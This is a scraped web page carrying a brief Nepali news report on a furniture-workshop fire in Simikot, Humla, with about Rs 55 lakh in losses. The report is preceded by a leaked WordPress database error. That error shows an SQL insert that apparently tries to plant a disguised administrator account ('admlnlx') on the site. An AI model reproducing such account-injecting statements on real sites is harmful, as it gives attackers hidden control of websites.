WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BtSdvnvatVbn5XQoEQPYgz77.M.8Px0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 01:10:55', '', 'admlnlx', 'admlnlx')
हुम्ला, मंसिर २६ –
सिमीकोट–२ बस्ने बलि रावतका फर्निचर कारखानामा शुक्रबार राति १२ बजेतिर आगलागी हुँदा रु ५५ लाख बराबरको क्षति पुगेको छ ।
उक्त कारखानमा यन्त्र, काठ, जस्ता समेत सामान जलेको थियो । नजिकै तोपसिंह लामाको घरमा पनि आगलागी हुँदा रु तीन लाख बराबरको क्षति भएको जिल्ला प्रहरी कार्यालयले जनाएको छ । – रासस